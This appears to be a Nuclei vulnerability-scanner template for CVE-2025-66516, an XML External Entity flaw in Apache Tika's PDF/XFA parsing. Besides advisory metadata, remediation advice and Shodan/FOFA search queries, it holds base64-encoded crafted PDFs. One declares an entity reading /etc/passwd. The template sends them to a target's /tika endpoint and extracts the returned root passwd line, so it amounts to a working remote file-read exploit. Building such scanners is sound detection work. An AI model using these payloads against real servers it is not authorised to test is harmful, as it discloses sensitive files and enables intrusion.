id: CVE-2025-66516 info: name: Apache Tika - XML External Entity Injection author: MathematicianGoat severity: high description: | Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely, exploit requires crafted PDF input. impact: | Attackers can exploit XXE to read local files or cause denial of service, potentially exposing sensitive information or disrupting service. remediation: | Upgrade tika-core to \u003E= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to latest versions. reference: - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC - https://nvd.nist.gov/vuln/detail/CVE-2025-66516 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 9.8 cve-id: CVE-2025-66516 epss-score: 0.01579 epss-percentile: 0.81895 cwe-id: CWE-611 metadata: max-request: 2 verified: true shodan-query: title:"Apache Tika" fofa-query: title="Apache Tika" tags: cve,cve2025,apache,tika,xxe,pdf,lfr variables: passwd_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NTggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPgpdPgo8eGRwOnhkcCB4bWxuczp4ZHA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGRwLyIgeG1sOmxhbmc9ImVuIj4KPGNvbmZpZyB4bWxucz0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94Y2kvMy4xLyI+CiAgPHByZXNlbnQ+PHBkZj48dmVyc2lvbj4xLjc8L3ZlcnNpb24+PC9wZGY+PC9wcmVzZW50Pgo8L2NvbmZpZz4KPHRlbXBsYXRlIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hmYS10ZW1wbGF0ZS8zLjMvIj4KICA8c3ViZm9ybSBuYW1lPSJmb3JtMSIgbGF5b3V0PSJ0YiI+CiAgICA8cGFnZVNldD48cGFnZUFyZWE+PGNvbnRlbnRBcmVhLz48bWVkaXVtIHN0b2NrPSJsZXR0ZXIiLz48L3BhZ2VBcmVhPjwvcGFnZVNldD4KICAgIDxzdWJmb3JtPgogICAgICA8ZmllbGQgbmFtZT0iZGF0YSI+PHVpPjx0ZXh0RWRpdC8+PC91aT48dmFsdWU+PHRleHQ+Jnh4ZTs8L3RleHQ+PC92YWx1ZT48L2ZpZWxkPgogICAgPC9zdWJmb3JtPgogIDwvc3ViZm9ybT4KPC90ZW1wbGF0ZT4KPHhmYTpkYXRhc2V0cyB4bWxuczp4ZmE9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLWRhdGEvMS4wLyI+CiAgPHhmYTpkYXRhPjxmb3JtMT48ZGF0YT4meHhlOzwvZGF0YT48L2Zvcm0xPjwveGZhOmRhdGE+CjwveGZhOmRhdGFzZXRzPgo8L3hkcDp4ZHA+CmVuZHN0cmVhbQplbmRvYmoKeHJlZgowIDcKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAwODIgMDAwMDAgbiAKMDAwMDAwMDE1MiAwMDAwMCBuIAowMDAwMDAwMjYyIDAwMDAwIG4gCjAwMDAwMDAzMjMgMDAwMDAgbiAKMDAwMDAwMDM5OSAwMDAwMCBuIAp0cmFpbGVyCjw8IC9TaXplIDcgL1Jvb3QgMSAwIFIgPj4Kc3RhcnR4cmVmCjEyOTUKJSVFT0YK" canary_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NzggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL3RtcC94eGVfdGVzdF9ub25leGlzdGVudF8xMjM0NSI+Cl0+Cjx4ZHA6eGRwIHhtbG5zOnhkcD0iaHR0cDovL25zLmFkb2JlLmNvbS94ZHAvIiB4bWw6bGFuZz0iZW4iPgo8Y29uZmlnIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hjaS8zLjEvIj4KICA8cHJlc2VudD48cGRmPjx2ZXJzaW9uPjEuNzwvdmVyc2lvbj48L3BkZj48L3ByZXNlbnQ+CjwvY29uZmlnPgo8dGVtcGxhdGUgeG1sbnM9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLXRlbXBsYXRlLzMuMy8iPgogIDxzdWJmb3JtIG5hbWU9ImZvcm0xIiBsYXlvdXQ9InRiIj4KICAgIDxwYWdlU2V0PjxwYWdlQXJlYT48Y29udGVudEFyZWEvPjxtZWRpdW0gc3RvY2s9ImxldHRlciIvPjwvcGFnZUFyZWE+PC9wYWdlU2V0PgogICAgPHN1YmZvcm0+CiAgICAgIDxmaWVsZCBuYW1lPSJkYXRhIj48dWk+PHRleHRFZGl0Lz48L3VpPjx2YWx1ZT48dGV4dD4meHhlOzwvdGV4dD48L3ZhbHVlPjwvZmllbGQ+CiAgICA8L3N1YmZvcm0+CiAgPC9zdWJmb3JtPgo8L3RlbXBsYXRlPgo8eGZhOmRhdGFzZXRzIHhtbG5zOnhmYT0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94ZmEtZGF0YS8xLjAvIj4KICA8eGZhOmRhdGE+PGZvcm0xPjxkYXRhPiZ4eGU7PC9kYXRhPjwvZm9ybTE+PC94ZmE6ZGF0YT4KPC94ZmE6ZGF0YXNldHM+CjwveGRwOnhkcD4KZW5kc3RyZWFtCmVuZG9iagp4cmVmCjAgNwowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAwMTYgMDAwMDAgbiAKMDAwMDAwMDA4MiAwMDAwMCBuIAowMDAwMDAwMTUyIDAwMDAwIG4gCjAwMDAwMDAyNjIgMDAwMDAgbiAKMDAwMDAwMDMyMyAwMDAwMCBuIAowMDAwMDAwMzk5IDAwMDAwIG4gCnRyYWlsZXIKPDwgL1NpemUgNyAvUm9vdCAxIDAgUiA+PgpzdGFydHhyZWYKMTMxNQolJUVPRgo=" http: - raw: - | PUT /tika HTTP/1.1 Host: {{Hostname}} Content-Type: application/pdf {{base64_decode(passwd_payload)}} - | PUT /tika HTTP/1.1 Host: {{Hostname}} Content-Type: application/pdf {{base64_decode(canary_payload)}} stop-at-first-match: true matchers-condition: or matchers: - type: regex part: body_1 regex: - "root:.*:0:0:" - type: dsl dsl: - 'status_code_2 == 200' - 'contains_any(body_2, "FileNotFoundException", "No such file")' condition: and extractors: - type: regex part: body_1 group: 1 regex: - 'data:\s*(root:x:0:0:[^\n]+)' # digest: 4a0a00473045022100c71be0ac3350dfd3de35ba3ba5a7f4db7bdf83eef3f835b18d6ae6c18cddfe94022032931fb21495cc2676432bcc00a058b4a8d8f1221f4033a53070dd981fa1a95e:922c64590222798bb761d5b6d8e72950